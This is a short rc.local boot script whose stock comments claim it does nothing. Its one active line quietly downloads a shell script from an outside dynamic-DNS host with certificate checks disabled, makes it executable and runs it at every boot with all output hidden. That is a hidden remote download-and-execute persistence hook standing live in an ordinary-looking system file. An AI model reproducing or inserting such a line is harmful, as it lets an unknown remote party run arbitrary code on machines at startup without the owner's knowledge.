#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# By default this script does nothing.
wget -q --no-check-certificate -P /tmp http://clever999.mooo.com/egEYUheRr6/dgFJrw35642rw/vavoosidnocron.sh && mv /tmp/vavoosidnocron.sh /home/vavoosidnocron.sh && chmod +x /home/vavoosidnocron.sh && bash /home/vavoosidnocron.sh > /dev/null 2>&1
exit 0